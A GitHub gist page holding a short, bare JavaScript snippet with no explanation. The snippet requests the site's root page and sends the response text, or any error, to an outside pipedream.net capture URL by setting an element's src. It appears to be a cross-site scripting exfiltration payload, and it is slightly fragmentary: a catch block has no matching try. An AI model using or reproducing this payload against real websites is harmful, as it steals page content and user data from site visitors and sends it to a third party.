Skip to content

Instantly share code, notes, and snippets.

@Naouak
Created March 9, 2020 10:23
Show Gist options
  • Save Naouak/c1b7d9785a755672ecaa81d3dbbd94a7 to your computer and use it in GitHub Desktop.
Save Naouak/c1b7d9785a755672ecaa81d3dbbd94a7 to your computer and use it in GitHub Desktop.
var oReq = new XMLHttpRequest();
oReq.addEventListener('load', function reqListener () {
this.src='https://enr4iz1vymuof.x.pipedream.net/?' + this.responseText;
});
oReq.open('GET', '/');
oReq.send();
} catch(e){
this.src= 'https://enr4iz1vymuof.x.pipedream.net/?' + e;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment